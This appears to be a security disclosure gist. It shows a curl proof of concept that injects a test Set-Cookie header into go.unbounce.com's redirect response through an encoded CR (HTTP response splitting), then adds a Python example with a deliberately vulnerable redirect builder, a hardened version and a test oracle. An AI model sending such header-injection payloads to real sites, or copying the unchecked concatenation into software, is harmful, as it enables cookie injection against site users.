Gist cedriczirtacic/6ba8bef86521c73d8040, last active October 13, 2017 17:16
Unbounce.com HTTP Response Splitting (CWE-113)
[cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: */*'
* About to connect() to go.unbounce.com port 80 (#0)
* Trying 54.225.243.45...
* connected
* Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
> GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
> User-Agent: curl/7.27.0
> Host: go.unbound.com
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Content-Type: text/html; charset=iso-8859-1
< Date: Wed, 02 Apr 2014 03:12:14 GMT
Set-Cookie: xxx=test; path=/; xxx2=/icing/clkn/http/
< Server: Apache
< Vary: Accept-Encoding
< Content-Length: 349
< Connection: keep-alive
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
Set-Cookie: xxx=test; path=/; xxx2=/">here</a>.</p>d.com/pricing/clkn/http/
<hr>
<address>Apache Server at go.unbound.com Port 80</address>
</body></html>
* Connection #0 to host go.unbounce.com left intact
* Closing connection #0
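The transcript above shows the effect of the defect but not the code pattern behind it. The following is an added example, not code from the gist or from Unbounce: a minimal redirect builder that reproduces the CWE-113 mistake (the percent-decoded request path is concatenated into the Location header without checking for CR/LF), the same builder with the check added, and a small response checker that a test suite can use to catch headers that user input managed to inject. The request path is taken from the transcript; the redirect base `http://www.example.com`, the function names and the lenient header parser (which treats CRLF, bare LF and bare CR alike as line terminators, the reading under which the single `%0d` in the transcript becomes a separate header) are all assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the request path from the curl transcript.
REQUEST_PATH = "/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2="
# Assumed redirect target; any absolute URL serves the demonstration.
REDIRECT_BASE = "http://www.example.com"

# Bytes a header value must never contain: NUL and the other C0 controls
# (which include CR and LF) and DEL. Field values are limited to VCHAR/obs-text.
_CTL = re.compile(r"[\x00-\x1f\x7f]")


def is_safe_redirect_path(path: str) -> bool:
    """True when the percent-decoded path carries no control character.
    Rejecting rather than encoding is deliberate: a legitimate redirect
    target never needs a raw CR or LF in it."""
    return _CTL.search(unquote(path)) is None


def build_redirect_vulnerable(path: str) -> bytes:
    """Reproduces the CWE-113 defect: the decoded path is pasted into the
    Location header unchecked, so a CR/LF inside it ends the header early
    and whatever follows goes out on the wire as a new header line."""
    location = REDIRECT_BASE + unquote(path)
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def build_redirect_hardened(path: str) -> bytes:
    """Same redirect, but the decoded value is validated before use."""
    if not is_safe_redirect_path(path):
        raise ValueError("control character in redirect path")
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {REDIRECT_BASE}{unquote(path)}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def parse_headers_lenient(raw: bytes) -> list[tuple[str, str]]:
    """Header parser modelled on a lenient client (an assumption, not any
    particular product): CRLF, bare LF and bare CR all end a line. Returns
    (lower-cased name, value) pairs in wire order, status line excluded."""
    head = re.split(rb"\r\n\r\n|\n\n|\r\r", raw, maxsplit=1)[0]
    headers = []
    for line in re.split(rb"\r\n|\n|\r", head)[1:]:
        if b":" not in line:
            continue
        name, _, value = line.partition(b":")
        headers.append((name.strip().decode("latin-1").lower(),
                        value.strip().decode("latin-1")))
    return headers


def unexpected_headers(raw: bytes, expected: set[str]) -> list[str]:
    """Names of response headers the handler never meant to send. Any name
    outside the expected set means request data reached the header block,
    which makes this a cheap oracle for a redirect endpoint's unit tests."""
    return [name for name, _ in parse_headers_lenient(raw) if name not in expected]


if __name__ == "__main__":
    expected = {"location", "content-length"}
    print(unexpected_headers(build_redirect_vulnerable(REQUEST_PATH), expected))
    try:
        build_redirect_hardened(REQUEST_PATH)
    except ValueError as exc:
        print("hardened handler refused the path:", exc)
```

Run against the transcript's path, the vulnerable builder yields a response in which the lenient parser sees a `set-cookie` header the handler never set, while the hardened builder refuses the path before any header is written. The same `unexpected_headers` check can be pointed at a captured response from a staging server to confirm that a fix actually removed the injected header rather than merely changing how it renders.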